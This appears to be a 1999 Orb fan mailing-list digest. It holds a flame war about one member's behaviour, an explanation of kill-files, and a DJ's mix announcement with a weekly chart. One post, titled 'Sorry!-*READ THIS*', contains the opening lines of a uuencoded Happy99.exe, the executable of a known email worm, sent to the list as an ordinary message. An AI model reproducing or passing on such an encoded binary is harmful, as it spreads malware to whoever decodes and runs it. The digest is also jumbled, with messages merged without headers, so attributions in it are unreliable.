Well, Chris, > short of commenting that "kill-filed" may be one of the most ignorant words > I've heard thus far in 1999 - I don't have anything else to say. Slander is, by definition, untrue. Reread what I wrote. In private email, the person in question sent more than one profanity-laced, tiresomely abusive message. Thug-like behaviour, in my book, and not a very promising indicator for his real-life behaviour. Certainly not someone I would recommend anyone spend time with, especially sight-unseen over the internet. You, of course, are free to do whatever you like, however, a public post of "hey, let me meet you/sleep on your floor" by such a person should be responded to by those who have some inkling of their behaviour. I like to think that *someone* would speak up if a known problem-child was acting up, rather than letting me get burned. (The recurring Dutton fiasco on the KLF-list springs to mind.) I kill-filed him, so that I wouldn't even have to press delete on his messages. Kill-file is a common term, at least on the rest of the internet. ;) (See below for an explanation, if needed). It *is* pejorative, but accurate. Ignorant? I think not. :/ I have exactly three people and two domains kill-filed, all of whom earned the priviledge by being repetitively abusive. > Vince Frank wrote: > By-the-way, what does "kill-filed" mean? :-/ A kill-file is an email filter. It means you never see email from the person/address/domain/etc. that you have filtered. In this case, I have the individual kill-filed, but still receive his posts to the list, as I don't want to filter anything from this mailing list. (Yet.) ;) Chris # Need help using (or leaving) this mailing list? # Send the command "info orb" to majordomo@lists.xmission.com. # To post, email orb@lists.xmission.com; replies go to original sender. ------------------------------ Date: Tue, 09 Feb 1999 18:20:24 -0800 From: Chris Johnson Subject: (orb) Sorry!-*READ THIS* begin 644 Happy99.exe M35I0``(````$``\`__\``+@`````````0``:```````````````````````` M``````````````````````$``+H0``X?M`G-(;@!3,TAD)!4:&ES('!R;V=R M86T@;75S="!B92!R=6X@=6YD97(@5VEN,S(-"B0W```````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````````````````````%!%``!,`00`GR77C@`` M````````X`".@0L!`AD`"@```!8```````````$````!`````@```$`````! The very best in stage performance, in my honest opinion. and one other tidbit Lunasol is their Ambient Pseudonym. Now, this guy who is calling LiquidW a thug couldn't be more wrong. He's definitly one of the nicer people I know, and I've known him for over 5 years. He has always been a good host when I've hung out with him... he's the one who introduced me to the Orb. Now I don't know what this guy could have against him, maybe LiquidW had a little email rage.. we've all seen it, its no big deal, sometimes email gets like that cuz its so impersonal.. its like when people yell at a fax machine or computer.. cuz it frustrates them.. u don't see an ACTUAL person in email, so raging is common... please, people, don't judge LiquidW.. I suggest, if u get the chance, to hook up with him and spend an evening together and make up ur own mind as to what kinda guy he is, u'll be pleasently surpised at how nice and generous he is. I guarentee you he is no thug. >> Of course, the fact that this individual comes across as a thug in >> personal email shouldn't stop anyone from letting them stay in your >> home, should it? :/ >--snip!-- >> (p.s. "Reviling" would have been a better choice of word than "slander". God - I hate it when people do that "avoid the issue, nitpick the little things" crap. I have a masters in English and I think I have sufficient literary skills to post a simple e-mail without being criticized too harshly. I'll admit - I did the same thing with the "kill-filed" thing (and I know the definition - it just sounds so ridiculously dramatic) ... but only in defense of LiquidW. He is someone with whom I've corresponded for an extended amount of time and consider to be a friend. I haven't noticed him to be any sort of thug - and I think your sending a post to that effect is excessively rude. Who really cares about the other little details when someone's reputation, or even worse, feelers might get hurt? If we're going to pick on little things - I think that damned winky face is just plain obnoxious. ; ) Sorry for the disruption with yet another non-orb e-mail.... we now return you to your regularly scheduled discussion of the OAA. If he was aware, he should be fired from his job that he obviously sent it from. If he wasn't aware, than he needs to take a more responsible approach to ensure that files he sends to others are virus free. DJ Orbette here. FIrst off my apologies for having taken so long to get in touch with all of you. It has been a very busy time for me and I have only now just caught up. News wise, the Orbette's World web site has changed addresses. The new address is http://ssa58.halls.colostate.edu/robyn/ This is a dedicated T-1 server, so for those of you that have had problems with the old site, this should help matters. Make your wave over to the "Mixes section" to hear not only the older mixes, but three brand new recordings of gigs in the local area. The styles vary on these from Trance to Drum & Bass to Experimental/Noisecore. Expect to hear more variation over the coming months, as I have been able to procure service from different labels. Big ups to the XI 120 and Nova/Mute crews for the experimental stuff. I will be featuring industrial, new age, and dub reggae mixes as well in the future, so if your label carries this kind of music, I would greatly appreciate your assistance. Lastly, check the mixes section tomorrow for the new mixes. Oh yeah should you have any problems with the mixes (like they don't play) the best solution is to copy and paste the desired mix's URL into the location field of your RealPlayerG2. Simple no? I say this as some people have had problems in the past. Okay as promised, here is my top ten list for the week of Feb. 8, 1999: 1. Electrofunk - Deep Love (edit) - Novice Recordings 2. Various Artists - Earth Juice - Waveform 3. Lionrock - City Delirious - Time Bomb Recordings/Concrete 4. Cavestar - Self Titled - Mindspore 5. A - Pan Sonic - Blast First/Mute Records Limited 6. Malcolm Goldstein - The Seasons ; Vermont - XI 120 7. Basskraft - A Bass Tribute to Kraftwerk - Pan Disc 8. Dub Tribe Sound System - Breeze 12" - Imperial Dub Recordings 9. Fila Brazillia - Power Clown - Pork Recordings 10. Orb - UF OFF - Island The next chart will be posted in two weeks, so keep your eyes open, For you label folks, a shameless plea, Should you like what you hear of the Mixes, please do me a favor and pass the word on to other label folks you may know. I will be in contact with labels myself, but if you could clue them in that would be GREAT! Thanks TONS!! Okay kiddies...Time to get my "Teletubbies" on. *evil grin* Until next time! ] Sincerely, DJ Orbette 116 North Meldrum #2 Fort Collins, CO USA 80521 *************************************************************** ORBETTE'S WORLD http://ssa58.halls.colostate.edu/robyn/ ************************************************************** # Need help using (or leaving) this mailing list? # Send the command "info orb" to majordomo@lists.xmission.com. # To post, email orb@lists.xmission.com; replies go to original sender. ------------------------------ End of orb-digest V2 #169 *************************
